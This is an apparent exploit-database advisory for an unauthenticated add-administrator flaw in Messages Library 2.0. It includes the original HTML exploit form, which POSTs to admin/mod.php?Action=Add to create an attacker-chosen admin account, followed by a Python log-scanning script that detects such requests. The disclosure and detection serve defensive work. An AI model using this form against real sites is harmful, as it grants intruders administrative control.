Vendor: Messages Library
By: milw0rm.com
CVSS: 9,3 (HIGH)
Remote Code Execution
CWE: 287
Product Name: Messages Library
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

ThE g0bL!N Messages Library 2.0 Remote Add Administrator Account

ThE g0bL!N Messages Library 2.0 allows a remote attacker to add an administrator account. The cause is missing authentication on the function that adds an administrator account: the application does not verify that the request comes from a logged-in administrator. An attacker can exploit this by sending a specially crafted HTTP POST request to the vulnerable application, which creates an administrator account with credentials of the attacker's choice.

Mitigation:

The vendor has released a patch to address this vulnerability.

Exploit-DB raw data:

<html>
<head>
<title>ThE g0bL!N  Messages Library 2.0 Remote Add Admintsrator Account </title>
<base target="left">
<link rel="stylesheet" href="style.css">
</head>
<body>
<form method="POST" action="http://path/sms/admin/mod.php?Action=Add">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
    <tr>
      <td width="25%"><font face="MS Sans Serif" size="2">Username</font></td>
      <td width="75%">&nbsp;<input type="text" name="Name" size="57"></td>
    </tr>
    <tr>
      <td width="25%"><font face="MS Sans Serif" size="2">Password</font></td>
      <td width="75%">&nbsp;<input type="password" name="Password" size="57"></td>
    </tr>
  </table>
  <p align="center"><input type="submit" value="add admin" name="B1"></p>
</form>
</body>
</html>

# milw0rm.com [2009-06-30]
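
Detection sketch, added here as an example and not part of the original advisory or the vendor's code: the form above is served from outside the application, so the POST it sends to admin/mod.php?Action=Add arrives with no Referer or with one from another host. The script below searches combined-format access logs for such requests. The log lines, addresses, host names and the index.php admin page are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx "combined" access-log format.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"'
)

def is_add_admin(method, target):
    """True for a POST to .../admin/mod.php carrying Action=Add in the query."""
    url = urlsplit(target)
    # Compare case-insensitively: over-matching is acceptable for triage.
    params = {k.lower(): v.lower() for k, v in parse_qsl(url.query)}
    path = unquote(url.path).lower()
    return (method == "POST" and path.endswith("/admin/mod.php")
            and params.get("action") == "add")

def suspicious_requests(lines, site_hosts):
    """Return (ip, timestamp, status, reason) for add-admin POSTs whose
    Referer is not one of the site's own host names."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or not is_add_admin(m["method"], m["target"]):
            continue
        ref_host = urlsplit(m["referer"]).hostname  # None for "-" or ""
        if ref_host in site_hosts:
            continue  # submitted from a page on the application itself
        reason = f"foreign referer {ref_host}" if ref_host else "missing referer"
        hits.append((m["ip"], m["ts"], m["status"], reason))
    return hits

# Constructed sample log lines (documentation addresses and host names).
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Jun/2009:10:01:02 +0000] "POST /sms/admin/mod.php?Action=Add HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [30/Jun/2009:10:05:40 +0000] "POST /sms/admin/mod.php?Action=Add HTTP/1.1" 200 512 "http://www.example.org/sms/admin/index.php" "Mozilla/5.0"',
    '203.0.113.8 - - [30/Jun/2009:10:07:11 +0000] "POST /sms/admin/mod.php?x=1&action=add HTTP/1.1" 302 0 "http://other.example.net/form.html" "Mozilla/5.0"',
    '198.51.100.9 - - [30/Jun/2009:10:09:00 +0000] "GET /sms/admin/mod.php?Action=Add HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG, {"www.example.org"}):
        print(*hit, sep="  ")
```

The Referer header is supplied by the client, so treat hits as triage leads and confirm them against the application's list of administrator accounts.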